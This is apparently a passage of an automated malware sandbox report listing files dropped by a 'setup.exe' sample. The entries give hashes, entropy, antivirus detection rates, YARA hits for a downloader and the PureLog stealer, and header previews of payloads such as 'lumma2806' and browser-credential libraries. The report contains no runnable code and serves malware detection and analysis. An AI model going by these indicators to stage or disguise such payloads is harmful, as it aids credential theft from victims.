SHA-256:	9CEDB9C553E6E933122596FB84C3F205AD74D6D181FCE72A63F2CBB8ABE6A2F5
SHA-512:	4CA80EA5590D08A0B33156DD9536EDD859DDB73D91C36FCAEBF91791444C484657BA487BF6524B120EAA55E39DBD53AC4B99B96C433002763F6DC9DDF5EDEE30
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runtime\32bcd6ad56338e82b2e9ecba5600bdb4\System.Runtime.ni.dll",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\File[1].bmp

Download File

Process:	C:\Users\user\Desktop\1719859269.0326595_setup.exe
File Type:	data
Category:	dropped
Size (bytes):	2776580
Entropy (8bit):	7.649062824915625
Encrypted:	false
SSDEEP:	49152:uXXHr/9B04/F4EqV7FdEfDbIko95+Z1E7iQcEIkn0:uXXHY4/FpqTdEfDbP1EOQcEIkn0
MD5:	7ECF48AAA1E1257B3D70412E139BC7F8
SHA1:	2FDC2423017BD353A606A3CBA87D735D23AFFA87
SHA-256:	EBE27C033786B4692736AD9F20AF3867F6E656DD8360840572087DE0C126E6E1
SHA-512:	20C7D74EADFAEBFFECC453FDC65B206210ED6D354F730AB50C75E554578CE8B681E13D2B091BDB4230FDCC8853362138E8BAEDD405D892C413901FF63E6643C8
Malicious:	false
Preview:	..fUXO......................................................................4..Y.4A}\|f5egzrgtx5vt{{za5wp5g`{5\|{5QZF5xzqp;...1.......EP..Y...u.js..................0..g......[.3..5...53......5........................?.......?.......................................3.^.....3.;y....................?......53..............................................5...............5..]...........;apma...A.0..5....0.................5..u;fqtat..-....53.......0.................;gfgv...;y....3..{....0.................;gpyzv........?......I?................W............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\amadka[1].exe

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1874432
Entropy (8bit):	7.9488539085621035
Encrypted:	false
SSDEEP:	49152:H9SVwma2ZsKjPkojbWQfH5KsqL2dP5yERwxfdqsot:HMKmaWL/WQfgsquY1G
MD5:	C773435D58037DE4E60797EA452B55D9
SHA1:	7F5229FCD5F0C3C42FB46193077CD92F1B748B82
SHA-256:	F87C35723547904BE1AA9F50D6FAD27D19B149CDE6714BC978A689D98399B799
SHA-512:	D006B3BE5B728ECB5664CA9DAEAB5E20680E0AF107D51A9FC831B617DDEA04A06F915D278DF72EAF7B8830A059098DA107298877917546929676691F9E56A691
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L.....af.............................PJ...........@...........................J.....`.....@.................................X...l...........................\|<J.............................,<J..................................................... . ............................@....rsrc...............................@....idata ............................@... ..*.........................@...jkbeubqv......0.....................@...ybbtgqtz.....@J......r..............@....taggant.0...PJ.."...x..............@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqlt[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2459136
Entropy (8bit):	6.052474106868353
Encrypted:	false
SSDEEP:	49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
MD5:	90E744829865D57082A7F452EDC90DE5
SHA1:	833B178775F39675FA4E55EAB1032353514E1052
SHA-256:	036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
SHA-512:	0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4\|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\123p[1].exe

Download File

Process:	C:\Users\user\Desktop\1719859269.0326595_setup.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10564608
Entropy (8bit):	7.969573483347947
Encrypted:	false
SSDEEP:	196608:7PyWqZApuYuBDhM7GsHkE5j5hKAbsZ2i0zdKRVZ6FspAE5EFH73AUYR:7aWNRuBDZsEChnK2VziVZdu3h8
MD5:	3B24971C5FEF776DB7DF10A769F0857A
SHA1:	AB314DDF208EF3E8D06F2F5E96F0F481075DE0F4
SHA-256:	0D990BEDAC4696A67AD46DBC686750086F72F4795ED8A6121782BA3B0DC736B5
SHA-512:	F70DCCD6FD95516EAC21B0CC30C70FB5F17C3C8F1F3B28FE3BDAEC6053C2DE53DAF68CAF422DEA8861E4AB84F3DD7BE36965C6998C1380DBF2A05A2A74B36B28
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....2pf..........#.................:..........@.......................................... ...................................................\|.<............M..`*...........................................M}.(....K..8............@.. ............................text...v~.......................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0...a%......................... ..`.text1..X....@......................@....text2..`'...P...(..................`..h.rsrc...............................@..@........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\crt[1].exe

Download File

Process:	C:\Users\user\Desktop\1719859269.0326595_setup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5391535
Entropy (8bit):	7.998995585318719
Encrypted:	true
SSDEEP:	98304:CEYQC32wcQ37FUnAh6faD0bIdGFqC21B5oVfQWcl2+tUQxy:VYDPl3CVaD0ctCWjoV7TiUQE
MD5:	CD591EBEF2FB36E6D0C67B0237D3B1BE
SHA1:	2BEA8EAA1E588A0F7FC3A73044D7B10A43659441
SHA-256:	451E864C9675147A8FAECA70522EFBCFF3B8B573B51D321D978DD57CFB16D419
SHA-512:	29CCD09717FE83C8D7DDDAE145A4A446550A3A6C7A7656A1CD9ADD832D8003177E4D73DF23047E45C7A1950434549C1D9F4756F8D1B7F537675F9B8880F5CE7C
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F......$.............@..........................@...................@..............................P........,..........................................................................................................CODE....D........................... ..`DATA....L...........................@...BSS.....L................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newsoftgnu[1].exe

Download File

Process:	C:\Users\user\Desktop\1719859269.0326595_setup.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4959240
Entropy (8bit):	7.149516507225811
Encrypted:	false
SSDEEP:	98304:QOHXslY4Scfsu4riBS64FsJHk0rxQyeYSKsXW:PHXslY4j4riIoJHkUeyexrXW
MD5:	06333E350E25E29677256D9BE86E4EE1
SHA1:	088FA1F912473C3DFB5AB118B0BC39EC016CF15A
SHA-256:	137A7220FB3CBE605B6C74712AD96DCB1BDEA1C489E9DF159044500CCC23F3C8
SHA-512:	1475FD313EF0CA847EB7921B5BFB017F9B7F9274497DF42FE3FA1477F40C6DA8723EE0C46FA5C3FAC6E9572C47712E1F4412C9460385C8F47117C82BEFDC329D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newsoftgnu[1].exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newsoftgnu[1].exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 54%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...% .f..................I...........J.. ... J...@.. ........................K.....o.L...@...................................J.K.... J..............K.......K.....f.J.............................................. ............... ..H............text.....I.. ....I................. ..`.rsrc....... J.......I.............@..@.reloc........K.......K.............@..B..................J.....H........5..\|.......k.....+.j............................................0..B.......+.(..yV(.p..8.....(.... .....:....&8....8........E........8........B+.(..nL~..........6+.(..W/~.......0..H.......+.(.DcX(.p..8......(.... .....:....& ....8....8........E........8......B+.(V..D~..........6+.(...\~.......0..........+.(..Ij ........8........E....O.......y.......^...8J...(.... .....:....&8....s......... ....8....s......... .....9....& ....8....s.........8....s......... .....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\super[1].exe

Download File

Process:	C:\Users\user\Desktop\1719859269.0326595_setup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2520576
Entropy (8bit):	7.982924566300698
Encrypted:	false
SSDEEP:	49152:z9hJ4NktFt2HtfCdk11Twmv7HjUYqG/jZ2h1gd6X0145:/WNkLEJC8T9LnqG70h1fX014
MD5:	B58A3998F5CE749FD2DD6B8651FDE46C
SHA1:	94BAC5909D2B5F2313D810F04587DB3C67C9DD5A
SHA-256:	7D094695351ABC8285AEA7A0612764CA1D12EF7B0C44ACA25ED560AC1D407C3D
SHA-512:	DB074390FE7B8DFA26A10D0DCCA56F3D66D72EBA96DDC6B7650E7B8C45E0DE58805ABE43D8F93E3291687FF075D900676552D6A3F7AC3C7B2D388C9F52111DA4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 46%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.dZ............a.......a.......a...5...............................Z...a.......a.......Rich............................PE..L.....uf......................!.....$.............@.......................... ............@... .. .... .. .......... ...................................................................................................................................................................@....................@..................@............0!..@......................@............P...p#.. ..................@.............y...#..(..................@....data....P".....B"..4..............@...........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\BotClient[1].bmp

Download File

Process:	C:\Users\user\Desktop\1719859269.0326595_setup.exe
File Type:	data
Category:	dropped
Size (bytes):	3828756
Entropy (8bit):	7.950185803437506
Encrypted:	false
SSDEEP:	98304:G/POy48psI0soQhzfXNHn0GDH4kcTSv9ac:Gnv4S7loQhRj4kc1c
MD5:	D2C328C49852296794A400C921C82E32
SHA1:	0E86ED2329A4A638B6D172D5E54F3187615A0664
SHA-256:	E3C5121806297E551D348D3869F99A82078C508A463E66E529232D94EF6B0DAA
SHA-512:	C0214FFD71C5B16D3EFD16C3EA408EDE805529F4306253122C27D54AE97719F0EC39FA789F7C7099700E3F388641FBBC1372A2B6DF47ECDE21E3C549CB099CF9
Malicious:	false
Preview:	..fUXO......................................................................4..Y.4A}\|f5egzrgtx5vt{{za5wp5g`{5\|{5QZF5xzqp;...1..........3...`...`...`...a...`...a0..`0V.`...`0V.a...`0V.a...`0V.a...`...a...`...a...`...a...`...`h..`...a...`...`...`...a...`G\|v}...`........................EP..Y...g?ks...............2............M5}.............................................o/.............................................................................................................................................................55555555n...........................5..u55555555.g..............................55555555.3...e..........................55555555................................55555555.T...%...%.....................W;\|qtat..................................;ayf....................................;gfgv...................................;a}px\|qt..B.........................u...;wzza.....%..5}...%.................u..u;gpyzv...............y/.............................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\crypted[1].bmp

Download File

Process:	C:\Users\user\Desktop\1719859269.0326595_setup.exe
File Type:	data
Category:	dropped
Size (bytes):	957444
Entropy (8bit):	7.297405271610944
Encrypted:	false
SSDEEP:	12288:tn6up6WL0QjUhiME+jOlAOmdwNUO5U71vW2A6OccffzwFFrtnvZYTD27dahq:tuWL0PbjOlcdUAF5nvcD+a8
MD5:	412C58C685E95BB96C614A332039DF29
SHA1:	3F04CF9790F7B79BFEE33963E2CBA975DA3C3EE0
SHA-256:	C5C7A372426864A7B4FC005FA00BC14A45DDABC380FE980EC4C3564E8BCF4296
SHA-512:	B8CA9F83FB4ED170A49D7F309D110A1C459A1A07827E3C60674A70DC628875D8E73A8572A0CFF212AA6A812AA3200A6B9DEB76727195459C8B2F5C4B51250C3B
Malicious:	false
Preview:	..fUXO......................................................................4..Y.4A}\|f5egzrgtx5vt{{za5wp5g`{5\|{5QZF5xzqp;...1..........m...>...>...>o..?...>o..?...>o..?...>~I.?...>~I.?...>o..?...>...><..>~I.?...>OJ.?...>OJ.?...>OJ.?...>G\|v}...>........................EP..Y....z.s...............2.}..._..........................................................................................]......E................................_...<..A............................=..............................................;apma....C.......M..................5..u;wff....h....e.......I..............5..u;gqtat..!............y..................;qtat...................................;gpyzv..._.......Y...E.................W............................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\setup[1].exe

Download File

Process:	C:\Users\user\Desktop\1719859269.0326595_setup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7636477
Entropy (8bit):	7.996918619729268
Encrypted:	true
SSDEEP:	196608:91Oqr2K/o4XJ8s0LZ3nyXvqcdWitz35+auw:3OsTJ/4FyXv1Ftzkg
MD5:	3821B6AD2BE5C1F137F798889C75B8FC
SHA1:	DD1112DFD70BC910C101D03BFA7CF73C4DCB5163
SHA-256:	A5B2E1710D105CAFBF8D3005D629EE8D6184F9F2CEAAB59ACE04DF1195B10B8A
SHA-512:	C853DCBDC88637AEEFBFFDB822E15B46A0A9710612E8BBC06A84CDB8370707EB32693215DC055363AB262DA41DADD0B036A2A6C8C8D884452AF0021957E8C35B
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\setup[2].exe

Download File

Process:	C:\Users\user\Desktop\1719859269.0326595_setup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7619942
Entropy (8bit):	7.996924391173374
Encrypted:	true
SSDEEP:	196608:91O9+4X1X5mPjXThLUJpEFKBzppdvKHL+6jlHj/HYeDA7ok5oge:3O9+4lXylL+sKBz3dv6HtzYCNme
MD5:	CB7CC0288990AB8DD4F1200D372A6A92
SHA1:	4791673A1535702F979AFA3372273535BD7C7365
SHA-256:	F8E840590292585AF7CF3A8C0902A30042CD23C05E01688A4641A7CA7E7343B9
SHA-512:	D7320620DF16527CACB294A4BFC4837C850A9866148AE5C76A9958EF24F0EF243DD305B99D3850AFD007C3653140E6C3A5148832B73A463761F85DB5FB19A756
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\streamer[1].exe

Download File

Process:	C:\Users\user\Desktop\1719859269.0326595_setup.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	8077824
Entropy (8bit):	6.5009378741766355
Encrypted:	false
SSDEEP:	49152:P8FC9tZ1LK9QkVNdZEOto3XOREES2CG9LlPJHzPihufFRDiLYDEwjB5EtC0D4DAh:UuG9QcnhnLxHmhYFBEtCHi1mK
MD5:	2BC0DB539A8FAB08BF4104EB7F2DE7E7
SHA1:	FF4A5DEFEDB18C93EF815434B40E19B9452CA410
SHA-256:	EC84EC11567566DB3BA9096DF164F0B7A8217D50FFAB16FA3642F8F12D759B04
SHA-512:	FFAEB6C876D2AEDA75B6576D2B307964A7B5330A0AB73352A4C95EF18AC3B1B1BFFF350805553833A754582ED54215337C376BCE0ABD44C117B5D8A0E1468D71
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$."...>{................@.....................................p{...`... .........................................N.... ..X....`...&....w..+.......................................... .w.(....................$..X............................text... !......."..................`.``.data...0g...@...h...&..............@.`..rdata..P.D...3...D...3.............@.`@.pdata...+....w..,....w.............@.0@.xdata..P.....y.......x.............@.0@.bss..........y.......................`..edata..N.............x.............@.0@.idata..X.... ........x.............@.0..CRT....p....@........x.............@.@..tls.........P........x.............@.@..rsrc....&...`...(....y.............@.0..reloc...............(z.............@.0B................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\lumma2806[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	528384
Entropy (8bit):	7.661614937929796
Encrypted:	false
SSDEEP:	12288:YwFARGxNB+mIuUOI+J0X6KALNGK34y1sB2Y+Jg4c:Yj4xb+mrZj1VHSB2Y6d
MD5:	0309DD0131150796EA99B30A62194FAE
SHA1:	2DF6E334708EAE810A74B844FD57E18E9FDC34CD
SHA-256:	07C09BA5A84F619E5B83A54298FFC58D20B00F14399C7A94B7F02B70EFC60F35
SHA-512:	3D4E5A0718D04FEE92D8040880B631107D1E23A6B3BCE430D58769179AF999C28B99E50C5CD45F283339F7BBB24FFACBF601A5447EDB12E28DA4517FBFA282E8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x...+...+...+z.....+z.....+z.....+k\....+k\....+z.....+...+(..+k\....+Z_....+Z_....+Z_....+Rich...+........PE..L......f...............'.@..........Rt.......P....@..........................0............@.............................P.......<...................................h...................................@............P..d............................text............0.................. ..`.BsS.........@.......4.............. ..`.rdata..4....P.......D..............@..@.data...............................@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zS188D.tmp\Install.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\7zSAB2.tmp\Install.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6980608
Entropy (8bit):	7.75787169422685
Encrypted:	false
SSDEEP:	196608:E71Qk81TbJCLnVnNaADRBScUYNeHE+T1EwSyuY:EBN8VbJIjSSNeqwu
MD5:	71BF676AE80AFA9F2577D2EAE6A133AE
SHA1:	0FEDCFBD17C9A11A97CE5C6B984926B5A510F533
SHA-256:	9F803C1FD9944D0050032ECD983DE008C13C0E939E66D13C1D138551D290BE99
SHA-512:	F8150AF3A932EAD9E6968569978DDBA194B6355D4AC65BFCD7E54302E2F7F4B944C27BAF3763297F5EDC2D8EDDB89BAFEA2489A79E1A77C695CC65FD967CF545
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
